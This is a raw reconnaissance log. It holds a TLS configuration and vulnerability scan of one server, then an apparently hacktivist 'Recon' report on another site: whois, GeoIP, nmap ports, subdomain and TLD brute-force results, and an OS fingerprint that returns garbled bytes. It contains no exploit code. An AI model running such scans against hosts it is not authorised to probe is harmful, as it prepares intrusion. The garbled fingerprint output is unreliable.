- DHE-RSA-AES128-SHA DHE-RSA-CAMELLIA128-SHA
- Elliptic curves offered: prime256v1
- Testing server preferences
- Has server cipher order? yes (OK)
- Negotiated protocol TLSv1.2
- Negotiated cipher ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
- Cipher order
- TLSv1: ECDHE-RSA-AES256-SHA DHE-RSA-AES256-SHA DHE-RSA-CAMELLIA256-SHA
- AES256-SHA CAMELLIA256-SHA ECDHE-RSA-AES128-SHA
- DHE-RSA-AES128-SHA DHE-RSA-CAMELLIA128-SHA AES128-SHA
- CAMELLIA128-SHA ECDHE-RSA-DES-CBC3-SHA EDH-RSA-DES-CBC3-SHA
- DES-CBC3-SHA
- TLSv1.1: ECDHE-RSA-AES256-SHA DHE-RSA-AES256-SHA DHE-RSA-CAMELLIA256-SHA
- AES256-SHA CAMELLIA256-SHA ECDHE-RSA-AES128-SHA
- DHE-RSA-AES128-SHA DHE-RSA-CAMELLIA128-SHA AES128-SHA
- CAMELLIA128-SHA ECDHE-RSA-DES-CBC3-SHA EDH-RSA-DES-CBC3-SHA
- DES-CBC3-SHA
- TLSv1.2: ECDHE-RSA-AES256-GCM-SHA384 ECDHE-RSA-AES256-SHA384
- ECDHE-RSA-AES256-SHA DHE-RSA-AES256-GCM-SHA384
- DHE-RSA-AES256-SHA256 DHE-RSA-AES256-SHA DHE-RSA-CAMELLIA256-SHA
- AES256-GCM-SHA384 AES256-SHA256 AES256-SHA CAMELLIA256-SHA
- ECDHE-RSA-AES128-GCM-SHA256 ECDHE-RSA-AES128-SHA256
- ECDHE-RSA-AES128-SHA DHE-RSA-AES128-GCM-SHA256
- DHE-RSA-AES128-SHA256 DHE-RSA-AES128-SHA DHE-RSA-CAMELLIA128-SHA
- AES128-GCM-SHA256 AES128-SHA256 AES128-SHA CAMELLIA128-SHA
- ECDHE-RSA-DES-CBC3-SHA EDH-RSA-DES-CBC3-SHA DES-CBC3-SHA
- Testing server defaults (Server Hello)
- TLS extensions (standard) "renegotiation info/#65281"
- "EC point formats/#11" "session ticket/#35"
- "heartbeat/#15"
- Session Ticket RFC 5077 hint 300 seconds, session tickets keys seems to be rotated < daily
- SSL Session ID support yes
- Session Resumption Tickets: yes, ID: yes
- TLS clock skew +385 sec from localtime
- Signature Algorithm SHA1 with RSA -- besides: users will receive a strong browser WARNING
- Server key size RSA 2048 bits
- Fingerprint / Serial SHA1 19EA54CEFF0E77B003342B0AAA9EA481F5650116 / 831942CF510F668A
- SHA256 F8DFD09CDE3786DFC7665BA6221BABC67030C5C390F19EA9790DB6B4CB2E5BEC
- Common Name (CN) localhost
- subjectAltName (SAN) missing (NOT ok) -- Browsers are complaining
- Issuer self-signed (NOT ok)
- Trust (hostname) certificate does not match supplied URI (same w/o SNI)
- Chain of trust NOT ok (self signed)
- EV cert (experimental) no
- Certificate Expiration 9269 >= 60 days (2015-10-01 05:40 --> 2043-02-15 04:40 -0500)
- # of certificates provided 1
- Certificate Revocation List NOT ok -- neither CRL nor OCSP URI provided
- OCSP URI --
- OCSP stapling --
- OCSP must staple no
- DNS CAA RR (experimental) --
- Certificate Transparency no
- Testing HTTP header response @ "/"
- HTTP Status Code 200 OK
- HTTP clock skew +387 sec from localtime
- Strict Transport Security --
- Public Key Pinning --
- Server banner Apache/2
- Application banner --
- Cookie(s) (none issued at "/")
- Security headers --
- Reverse Proxy banner --
- Testing vulnerabilities
- Heartbleed (CVE-2014-0160) not vulnerable (OK), timed out
- CCS (CVE-2014-0224) not vulnerable (OK)
- Ticketbleed (CVE-2016-9244), experiment. not vulnerable (OK), memory fragments do not differ
- Secure Renegotiation (CVE-2009-3555) not vulnerable (OK)
- Secure Client-Initiated Renegotiation not vulnerable (OK)
- CRIME, TLS (CVE-2012-4929) not vulnerable (OK)
- BREACH (CVE-2013-3587) no HTTP compression (OK) - only supplied "/" tested
- POODLE, SSL (CVE-2014-3566) not vulnerable (OK)
- TLS_FALLBACK_SCSV (RFC 7507) Downgrade attack prevention supported (OK)
- SWEET32 (CVE-2016-2183, CVE-2016-6329) VULNERABLE, uses 64 bit block ciphers
- FREAK (CVE-2015-0204) not vulnerable (OK)
- DROWN (CVE-2016-0800, CVE-2016-0703) not vulnerable on this host and port (OK)
- make sure you don't use this certificate elsewhere with SSLv2 enabled services
- https://censys.io/ipv4?q=F8DFD09CDE3786DFC7665BA6221BABC67030C5C390F19EA9790DB6B4CB2E5BEC could help you to find out
- LOGJAM (CVE-2015-4000), experimental Common prime with 2048 bits detected: RFC3526/Oakley Group 14,
- but no DH EXPORT ciphers
- BEAST (CVE-2011-3389) TLS1: ECDHE-RSA-AES256-SHA
- DHE-RSA-AES256-SHA
- DHE-RSA-CAMELLIA256-SHA
- AES256-SHA CAMELLIA256-SHA
- ECDHE-RSA-AES128-SHA
- DHE-RSA-AES128-SHA
- DHE-RSA-CAMELLIA128-SHA
- AES128-SHA CAMELLIA128-SHA
- ECDHE-RSA-DES-CBC3-SHA
- EDH-RSA-DES-CBC3-SHA
- DES-CBC3-SHA
- VULNERABLE -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
- LUCKY13 (CVE-2013-0169), experimental potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS
- RC4 (CVE-2013-2566, CVE-2015-2808) no RC4 ciphers detected (OK)
- Testing 359 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength
- Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
- -----------------------------------------------------------------------------------------------------------------------------
- xc030 ECDHE-RSA-AES256-GCM-SHA384 ECDH 256 AESGCM 256 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
- xc028 ECDHE-RSA-AES256-SHA384 ECDH 256 AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
- xc014 ECDHE-RSA-AES256-SHA ECDH 256 AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
- x9f DHE-RSA-AES256-GCM-SHA384 DH 2048 AESGCM 256 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
- x6b DHE-RSA-AES256-SHA256 DH 2048 AES 256 TLS_DHE_RSA_WITH_AES_256_CBC_SHA256
- x39 DHE-RSA-AES256-SHA DH 2048 AES 256 TLS_DHE_RSA_WITH_AES_256_CBC_SHA
- x88 DHE-RSA-CAMELLIA256-SHA DH 2048 Camellia 256 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
- x9d AES256-GCM-SHA384 RSA AESGCM 256 TLS_RSA_WITH_AES_256_GCM_SHA384
- x3d AES256-SHA256 RSA AES 256 TLS_RSA_WITH_AES_256_CBC_SHA256
- x35 AES256-SHA RSA AES 256 TLS_RSA_WITH_AES_256_CBC_SHA
- x84 CAMELLIA256-SHA RSA Camellia 256 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA
- xc02f ECDHE-RSA-AES128-GCM-SHA256 ECDH 256 AESGCM 128 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
- xc027 ECDHE-RSA-AES128-SHA256 ECDH 256 AES 128 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
- xc013 ECDHE-RSA-AES128-SHA ECDH 256 AES 128 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
- x9e DHE-RSA-AES128-GCM-SHA256 DH 2048 AESGCM 128 TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
- x67 DHE-RSA-AES128-SHA256 DH 2048 AES 128 TLS_DHE_RSA_WITH_AES_128_CBC_SHA256
- x33 DHE-RSA-AES128-SHA DH 2048 AES 128 TLS_DHE_RSA_WITH_AES_128_CBC_SHA
- x45 DHE-RSA-CAMELLIA128-SHA DH 2048 Camellia 128 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA
- x9c AES128-GCM-SHA256 RSA AESGCM 128 TLS_RSA_WITH_AES_128_GCM_SHA256
- x3c AES128-SHA256 RSA AES 128 TLS_RSA_WITH_AES_128_CBC_SHA256
- x2f AES128-SHA RSA AES 128 TLS_RSA_WITH_AES_128_CBC_SHA
- x41 CAMELLIA128-SHA RSA Camellia 128 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA
- xc012 ECDHE-RSA-DES-CBC3-SHA ECDH 256 3DES 168 TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
- x16 EDH-RSA-DES-CBC3-SHA DH 2048 3DES 168 TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
- x0a DES-CBC3-SHA RSA 3DES 168 TLS_RSA_WITH_3DES_EDE_CBC_SHA
- Running client simulations via sockets
- Android 2.3.7 TLSv1.0 DHE-RSA-AES128-SHA, 2048 bit DH
- Android 4.1.1 TLSv1.0 ECDHE-RSA-AES256-SHA, 256 bit ECDH (P-256)
- Android 4.3 TLSv1.0 ECDHE-RSA-AES256-SHA, 256 bit ECDH (P-256)
- Android 4.4.2 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
- Android 5.0.0 TLSv1.2 ECDHE-RSA-AES256-SHA, 256 bit ECDH (P-256)
- Android 6.0 TLSv1.2 ECDHE-RSA-AES256-SHA, 256 bit ECDH (P-256)
- Android 7.0 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
- Chrome 51 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
- Chrome 57 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
- Firefox 49 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
- Firefox 53 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
- IE 6 XP No connection
- IE 7 Vista TLSv1.0 ECDHE-RSA-AES256-SHA, 256 bit ECDH (P-256)
- IE 8 XP TLSv1.0 DES-CBC3-SHA
- IE 8 Win 7 TLSv1.0 ECDHE-RSA-AES256-SHA, 256 bit ECDH (P-256)
- IE 11 Win 7 TLSv1.2 ECDHE-RSA-AES256-SHA384, 256 bit ECDH (P-256)
- IE 11 Win 8.1 TLSv1.2 ECDHE-RSA-AES256-SHA384, 256 bit ECDH (P-256)
- IE 11 Win Phone 8.1 Update TLSv1.2 ECDHE-RSA-AES256-SHA384, 256 bit ECDH (P-256)
- IE 11 Win 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
- Edge 13 Win 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
- Edge 13 Win Phone 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
- Opera 17 Win 7 TLSv1.2 ECDHE-RSA-AES256-SHA, 256 bit ECDH (P-256)
- Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-RSA-AES256-SHA, 256 bit ECDH (P-256)
- Safari 7 iOS 7.1 TLSv1.2 ECDHE-RSA-AES256-SHA384, 256 bit ECDH (P-256)
- Safari 9 OS X 10.11 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
- Safari 10 OS X 10.12 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
- Apple ATS 9 iOS 9 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
- Tor 17.0.9 Win 7 TLSv1.0 ECDHE-RSA-AES256-SHA, 256 bit ECDH (P-256)
- Java 6u45 No connection
- Java 7u25 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
- Java 8u31 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- OpenSSL 1.0.1l TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
- OpenSSL 1.0.2e TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
- Done 2017-09-29 23:24:51 [ 201s] -->> 80.82.69.63:443 (cv2.dreamcaster.info) <<--
- ######################################################################################################################################
- Hostname video1.school-models.net ISP Tele Asia Limited (AS133398)
- Continent Europe Flag
- LT
- Country Lithuania Country Code LT (LTU)
- Region 57 Local time 30 Sep 2017 07:17 EEST
- Metropolis Unknown Postal Code 44001
- City Kaunas Latitude 54.9
- IP Address 45.123.190.187 Longitude 23.9
- ######################################################################################################################################
- HunterUnit JTSEC full Recon Anonymous #2
- [i] Scanning Site: http://video1.school-models.net
- B A S I C I N F O
- ====================
- [+] Site Title: SCHOOL MODELS|ORIENTAL SCHOOLGIRLS NONUDE| SCHOOL MODELS VIDEO ISSUE 1
- [+] IP address: 45.123.190.187
- [+] Web Server: nginx/1.10.2
- [+] CMS: Could Not Detect
- [+] Cloudflare: Not Detected
- [+] Robots File: Found
- -------------[ contents ]----------------
- # vestacp autogenerated robots.txt
- User-agent: *
- Crawl-delay: 10
- -----------[end of contents]-------------
- W H O I S L O O K U P
- ========================
- No match for "VIDEO1.SCHOOL-MODELS.NET".
- >>> Last update of whois database: 2017-09-30T04:19:03Z <<<
- NOTICE: The expiration date displayed in this record is the date the
- registrar's sponsorship of the domain name registration in the registry is
- currently set to expire. This date does not necessarily reflect the expiration
- date of the domain name registrant's agreement with the sponsoring
- registrar. Users may consult the sponsoring registrar's Whois database to
- view the registrar's reported date of expiration for this registration.
- The Registry database contains ONLY .COM, .NET, .EDU domains and
- Registrars.
- G E O I P L O O K U P
- =========================
- [i] IP Address: 45.123.190.187
- [i] Country: LT
- [i] State: Kauno Apskritis
- [i] City: Kaunas
- [i] Latitude: 54.900002
- [i] Longitude: 23.900000
- H T T P H E A D E R S
- =======================
- [i] HTTP/1.1 200 OK
- [i] Server: nginx/1.10.2
- [i] Date: Sat, 30 Sep 2017 01:19:33 GMT
- [i] Content-Type: text/html; charset=UTF-8
- [i] Content-Length: 13395
- [i] Connection: close
- [i] Last-Modified: Sat, 07 Nov 2015 09:35:35 GMT
- [i] ETag: "3453-523f0150007c0"
- [i] Accept-Ranges: bytes
- D N S L O O K U P
- ===================
- video1.school-models.net. 295 IN A 45.123.190.187
- S U B N E T C A L C U L A T I O N
- ====================================
- Address = 45.123.190.187
- Network = 45.123.190.187 / 32
- Netmask = 255.255.255.255
- Broadcast = not needed on Point-to-Point links
- Wildcard Mask = 0.0.0.0
- Hosts Bits = 0
- Max. Hosts = 1 (2^0 - 0)
- Host Range = { 45.123.190.187 - 45.123.190.187 }
- N M A P P O R T S C A N
- ============================
- Starting Nmap 7.01 ( https://nmap.org ) at 2017-09-30 04:19 UTC
- Nmap scan report for video1.school-models.net (45.123.190.187)
- Host is up (0.15s latency).
- PORT STATE SERVICE VERSION
- 21/tcp closed ftp
- 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
- 23/tcp closed telnet
- 25/tcp closed smtp
- 80/tcp open http nginx 1.10.2
- 110/tcp closed pop3
- 143/tcp closed imap
- 443/tcp closed https
- 445/tcp closed microsoft-ds
- 3389/tcp closed ms-wbt-server
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 14.02 seconds
- S U B - D O M A I N F I N D E R
- ==================================
- [i] Total Subdomains Found : 1
- [+] Subdomain: video1.school-models.net
- [-] IP: 191.96.113.236
- R E V E R S E I P L O O K U P
- ==================================
- [*] Performing TLD Brute force Enumeration against 45.123.190.187
- [*] The operation could take up to: 00:01:07
- [*] A 45.ae 108.178.13.98
- [*] A 45.biz.af 5.45.75.45
- [*] A 45.ac 108.30.224.195
- [*] A 45.ai 23.234.27.209
- [*] A 45.al 176.9.32.122
- [*] A 45.am 43.252.120.170
- [*] A 45.at 72.52.4.90
- [*] A 45.co.asia 91.195.240.135
- [*] CNAME 45.biz.at free.biz.at
- [*] A free.biz.at 216.92.134.29
- [*] A 45.com.au 103.224.212.245
- [*] A 45.net.au 98.124.245.24
- [*] A 45.com.ax 185.55.85.123
- [*] A 45.org.aw 142.4.20.12
- [*] A 45.org.ax 185.55.85.123
- [*] A 45.com.am 118.193.137.224
- [*] A 45.co.ba 176.9.45.78
- [*] A 45.com.ba 195.222.33.180
- [*] A 45.be 217.19.237.54
- [*] A 45.com.be 95.173.170.166
- [*] A 45.by 178.162.211.68
- [*] A 45.biz.by 71.18.52.2
- [*] A 45.biz.bz 199.59.242.150
- [*] A 45.com.cc 54.252.107.64
- [*] A 45.net.cc 54.252.89.206
- [*] A 45.co.cc 175.126.123.219
- [*] A 45.cc 59.34.148.176
- [*] A 45.org.ch 72.52.4.122
- [*] A 45.ci 107.174.240.163
- [*] A 45.cl 72.52.4.90
- [*] A 45.biz.cl 185.53.178.8
- [*] A 45.cm 119.28.21.224
- [*] A 45.co.cm 85.25.140.105
- [*] CNAME 45.biz.cm i.cns.cm
- [*] A i.cns.cm 118.184.56.30
- [*] A 45.co 208.73.211.70
- [*] CNAME 45.cn num4.dcoin.co
- [*] A num4.dcoin.co 170.178.178.54
- [*] CNAME 45.com.cn num4.dcoin.co
- [*] A num4.dcoin.co 170.178.178.54
- [*] CNAME 45.net.cn num4.dcoin.co
- [*] A num4.dcoin.co 170.178.178.54
- [*] CNAME 45.org.cn num4.dcoin.co
- [*] A num4.dcoin.co 170.178.178.54
- [*] A 45.com.co 185.53.178.6
- [*] A 45.com.com 52.33.196.199
- [*] A 45.net.com 199.59.242.150
- [*] A 45.co.com 173.192.115.17
- [*] A 45.org.com 23.23.86.44
- [*] A 45.net.cm 85.25.140.105
- [*] A 45.biz.cr 72.52.4.122
- [*] A 45.biz.cx 72.52.4.122
- [*] A 45.cz 109.123.216.97
- [*] A 45.net.cz 80.250.24.177
- [*] A 45.com.cz 62.109.128.30
- [*] A 45.biz.cz 185.53.179.7
- [*] CNAME 45.cx parkmydomain.vhostgo.com
- [*] CNAME parkmydomain.vhostgo.com westuser.dopa.com
- [*] A westuser.dopa.com 107.186.245.119
- [*] A 45.com.de 50.56.68.37
- [*] A 45.de 89.238.79.227
- [*] CNAME 45.co.de co.de
- [*] A co.de 144.76.162.245
- [*] CNAME 45.org.de www.org.de
- [*] A www.org.de 78.47.128.8
- [*] A 45.dk 81.19.232.104
- [*] A 45.eu 72.52.4.90
- [*] A 45.net.eu 78.46.90.98
- [*] A 45.org.eu 78.46.90.98
- [*] A 45.biz.fi 185.55.85.123
- [*] CNAME 45.com.fi dnspod-vip3.mydnspod.net
- [*] A dnspod-vip3.mydnspod.net 119.28.48.237
- [*] A dnspod-vip3.mydnspod.net 119.28.48.218
- [*] A 45.fm 173.230.131.38
- [*] A 45.biz.fm 173.230.131.38
- [*] A 45.fr 178.32.4.52
- [*] A 45.org.fr 149.202.133.35
- [*] A 45.gg 103.39.110.120
- [*] A 45.biz.gl 72.52.4.122
- [*] A 45.co.gp 144.76.162.245
- [*] A 45.gs 23.23.99.200
- [*] A 45.gs 54.243.242.40
- [*] A 45.co.hn 208.100.40.203
- [*] A 45.com.hk 107.150.98.48
- [*] CNAME 45.biz.hn parkmydomain.vhostgo.com
- [*] CNAME parkmydomain.vhostgo.com westuser.dopa.com
- [*] A westuser.dopa.com 107.186.245.119
- [*] CNAME 45.net.hr net.hr
- [*] A net.hr 192.0.78.24
- [*] A net.hr 192.0.78.25
- [*] A 45.co.ht 72.52.4.122
- [*] A 45.id 203.119.112.50
- [*] A 45.io 69.172.201.153
- [*] A 45.is 67.199.248.12
- [*] A 45.is 67.199.248.13
- [*] CNAME 45.je num4.dcoin.co
- [*] A num4.dcoin.co 170.178.178.54
- [*] A 45.jobs 50.19.241.165
- [*] A 45.co.jobs 50.17.193.222
- [*] A 45.net.jobs 50.19.241.165
- [*] A 45.com.jobs 50.19.241.165
- [*] A 45.biz.jobs 50.19.241.165
- [*] A 45.org.jobs 50.19.241.165
- [*] A 45.co.kr 210.219.173.152
- [*] A 45.biz.ky 199.184.144.27
- [*] A 45.kz 47.88.56.244
- [*] A 45.la 162.159.209.75
- [*] A 45.la 162.159.208.75
- [*] CNAME 45.biz.li 712936.parkingcrew.net
- [*] A 712936.parkingcrew.net 185.53.179.29
- [*] A 45.lt 216.239.32.21
- [*] A 45.lt 216.239.34.21
- [*] A 45.lt 216.239.36.21
- [*] A 45.lt 216.239.38.21
- [*] A 45.biz.lu 195.26.5.2
- [*] A 45.lv 72.52.4.90
- [*] A 45.biz.ly 64.136.20.39
- [*] A 45.ma 41.77.113.174
- [*] A 45.biz.md 72.52.4.122
- [*] A 45.me 50.63.201.98
- [*] CNAME 45.mg cs.62.net
- [*] A cs.62.net 47.88.28.14
- [*] A 45.mk 59.188.251.64
- [*] A 45.co.mk 87.76.31.211
- [*] A 45.ms 121.127.236.68
- [*] A 45.co.mobi 54.225.105.179
- [*] A 45.com.mx 185.53.178.9
- [*] A 45.biz.my 202.190.174.44
- [*] A 45.net 208.73.211.165
- [*] A 45.net 208.73.210.202
- [*] A 45.net 208.73.210.217
- [*] A 45.net 208.73.211.177
- [*] A 45.co.net 188.166.216.219
- [*] A 45.net.net 52.50.81.210
- [*] A 45.org.net 23.23.86.44
- [*] A 45.co.nl 37.97.184.204
- [*] A 45.nl 212.29.175.19
- [*] A 45.com.nl 83.98.157.102
- [*] A 45.net.nl 83.98.157.102
- [*] A 45.no 72.52.4.90
- [*] A 45.co.nr 208.100.40.202
- [*] A 45.nu 194.9.94.85
- [*] A 45.nu 194.9.94.86
- [*] A 45.com.nu 144.76.162.245
- [*] A 45.org.nu 80.92.84.139
- [*] CNAME 45.co.nu co.nu
- [*] A co.nu 144.76.162.245
- [*] A 45.nz 185.53.179.6
- [*] A 45.net.nu 199.102.76.78
- [*] A 45.co.nz 185.53.178.8
- [*] A 45.org 199.59.242.150
- [*] CNAME 45.net.org pewtrusts.org
- [*] A pewtrusts.org 204.74.99.100
- [*] A 45.com.org 23.23.86.44
- [*] A 45.ph 45.79.222.138
- [*] A 45.co.ph 45.79.222.138
- [*] A 45.com.ph 45.79.222.138
- [*] A 45.net.ph 45.79.222.138
- [*] A 45.org.ph 45.79.222.138
- [*] A 45.pl 94.152.8.9
- [*] A 45.pm 213.186.33.5
- [*] A 45.co.pl 212.91.6.55
- [*] A 45.org.pm 208.73.211.177
- [*] A 45.org.pm 208.73.210.202
- [*] A 45.org.pm 208.73.211.165
- [*] A 45.org.pm 208.73.210.217
- [*] A 45.co.ps 66.96.132.56
- [*] A 45.co.pt 194.107.127.52
- [*] A 45.pw 141.8.226.58
- [*] CNAME 45.biz.ps biz.ps
- [*] A biz.ps 144.76.162.245
- [*] A 45.co.pw 141.8.226.59
- [*] A 45.net.pw 141.8.226.59
- [*] A 45.biz.pw 141.8.226.59
- [*] A 45.org.pw 141.8.226.59
- [*] A 45.re 213.186.33.5
- [*] A 45.net.ro 69.64.52.127
- [*] CNAME 45.co.ro now.co.ro
- [*] A now.co.ro 185.27.255.9
- [*] A 45.org.re 217.70.184.38
- [*] A 45.ro 89.36.93.227
- [*] A 45.ru 195.226.222.22
- [*] A 45.ru 195.226.222.21
- [*] A 45.com.ru 178.210.89.119
- [*] A 45.se 72.52.4.90
- [*] A 45.biz.se 185.53.179.6
- [*] CNAME 45.net.se 773147.parkingcrew.net
- [*] A 773147.parkingcrew.net 185.53.179.29
- [*] A 45.sk 46.4.113.74
- [*] A 45.co.sl 91.195.240.135
- [*] A 45.com.sr 143.95.106.249
- [*] A 45.co.su 72.52.4.122
- [*] A 45.biz.st 91.121.28.115
- [*] A 45.su 91.195.240.135
- [*] A 45.biz.tc 64.136.20.39
- [*] A 45.tel 75.126.102.249
- [*] A 45.biz.tf 85.236.153.18
- [*] A 45.tk 195.20.45.204
- [*] A 45.co.tl 208.100.40.202
- [*] A 45.net.tf 188.40.70.29
- [*] A 45.net.tf 188.40.70.27
- [*] A 45.net.tf 188.40.117.12
- [*] A 45.tn 213.186.33.5
- [*] A 45.co.to 175.118.124.44
- [*] A 45.co.tv 31.186.25.163
- [*] A 45.biz.tv 72.52.4.122
- [*] A 45.org.tv 72.52.4.122
- [*] A 45.tt 58.64.137.93
- [*] A 45.net.ua 109.72.149.70
- [*] A 45.com.ua 171.25.204.81
- [*] A 45.org.ua 91.206.226.41
- [*] A 45.co.uk 87.106.142.81
- [*] CNAME 45.biz.uz biz.uz
- [*] A biz.uz 144.76.162.245
- [*] A 45.co.vg 88.198.29.97
- [*] A 45.com.vg 88.198.29.97
- [*] A 45.net.vg 68.178.254.180
- [*] A 45.biz.vg 89.31.143.20
- [*] A 45.org.uk 52.58.78.16
- [*] A 45.com.ws 202.4.48.211
- [*] A 45.ws 69.172.201.153
- [*] A 45.net.ws 202.4.48.211
- [*] A 45.biz.ws 184.168.221.104
- [*] A 45.org.ws 202.4.48.211
- [*] A 45.yt 153.120.157.112
- [*] A 45.vc 52.58.78.16
- [*] A 45.co.za 50.63.89.1
- % [whois.apnic.net]
- % Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
- % Information related to '45.123.190.0 - 45.123.190.255'
- % Abuse contact for '45.123.190.0 - 45.123.190.255' is 'support@hosthongkong.net'
- inetnum: 45.123.190.0 - 45.123.190.255
- netname: HostBaltic-LT
- descr: HostBaltic Lithuania
- country: LT
- admin-c: RPCL1-AP
- tech-c: RPCL1-AP
- status: ALLOCATED NON-PORTABLE
- mnt-by: MAINT-RPL-HK
- mnt-irt: IRT-RPL-HK
- changed: admin@hostbaltic.com 20151128
- source: APNIC
- irt: IRT-RPL-HK
- address: RMP Protection Limited, 211 Poly Centre, 15 Yip Fung Street, Fanling, Hong Kong
- e-mail: support@hosthongkong.net
- abuse-mailbox: support@hosthongkong.net
- admin-c: RPCL1-AP
- tech-c: RPCL1-AP
- auth: # Filtered
- mnt-by: MAINT-RPL-HK
- changed: hm-changed@apnic.net 20131108
- source: APNIC
- role: RMP Protection Company Limited administrator
- address: RMPP, 211 Poly Centre, Fanling
- country: HK
- phone: +852 2607 4483
- fax-no: +852 2607 4483
- e-mail: abuse@hosthongkong.net
- admin-c: RPCL1-AP
- tech-c: RPCL1-AP
- nic-hdl: RPCL1-AP
- mnt-by: MAINT-RPL-HK
- changed: hm-changed@apnic.net 20160226
- source: APNIC
- % Information related to '45.123.190.0/24AS133398'
- route: 45.123.190.0/24
- descr: route object for 45.123.190.0/24
- origin: AS133398
- mnt-by: MAINT-RPL-HK
- changed: admin@hostbaltic.com 20160526
- country: LT
- source: APNIC
- % This query was served by the APNIC Whois Service version 1.88.15-37 (WHOIS-US4)
- + -- ----------------------------=[Running Nslookup]=------------------------ -- +
- Server: 192.168.1.254
- Address: 192.168.1.254#53
- Non-authoritative answer:
- Name: video1.school-models.net
- Address: 45.123.190.187
- video1.school-models.net has address 45.123.190.187
- + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +
- Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
- [+] Target is video1.school-models.net
- [+] Loading modules.
- [+] Following modules are loaded:
- [x] [1] ping:icmp_ping - ICMP echo discovery module
- [x] [2] ping:tcp_ping - TCP-based ping discovery module
- [x] [3] ping:udp_ping - UDP-based ping discovery module
- [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
- [x] [5] infogather:portscan - TCP and UDP PortScanner
- [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
- [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
- [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
- [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
- [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
- [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
- [x] [12] fingerprint:smb - SMB fingerprinting module
- [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
- [+] 13 modules registered
- [+] Initializing scan engine
- [+] Running scan engine
- [-] ping:tcp_ping module: no closed/open TCP ports known on 45.123.190.187. Module test failed
- [-] ping:udp_ping module: no closed/open UDP ports known on 45.123.190.187. Module test failed
- [-] No distance calculation. 45.123.190.187 appears to be dead or no ports known
- [+] Host: 45.123.190.187 is up (Guess probability: 50%)
- [+] Target: 45.123.190.187 is alive. Round-Trip Time: 0.49167 sec
- [+] Selected safe Round-Trip Time value is: 0.98335 sec
- [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
- [-] fingerprint:smb need either TCP port 139 or 445 to run
- [-] fingerprint:snmp: need UDP port 161 open
- [+] Primary guess:
- [+] Host 45.123.190.187 Running OS: p�@�V (Guess probability: 100%)
- [+] Other guesses:
- [+] Host 45.123.190.187 Running OS: p�@�V (Guess probability: 100%)
- [+] Host 45.123.190.187 Running OS: p�@�V (Guess probability: 100%)
- [+] Host 45.123.190.187 Running OS: p�@�V (Guess probability: 100%)
- [+] Host 45.123.190.187 Running OS: p�@�V (Guess probability: 100%)
- [+] Host 45.123.190.187 Running OS: p�@�V (Guess probability: 100%)
- [+] Host 45.123.190.187 Running OS: p�@�V (Guess probability: 100%)
- [+] Host 45.123.190.187 Running OS: p�@�V (Guess probability: 100%)
- [+] Host 45.123.190.187 Running OS: p�@�V (Guess probability: 100%)
- [+] Host 45.123.190.187 Running OS: p�@�V (Guess probability: 100%)
- [+] Cleaning up scan engine
- [+] Modules deinitialized
- [+] Execution completed.
- + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +
- No match for "VIDEO1.SCHOOL-MODELS.NET".
- >>> Last update of whois database: 2017-10-02T00:13:23Z <<<
- NOTICE: The expiration date displayed in this record is the date the
- registrar's sponsorship of the domain name registration in the registry is
- currently set to expire. This date does not necessarily reflect the expiration
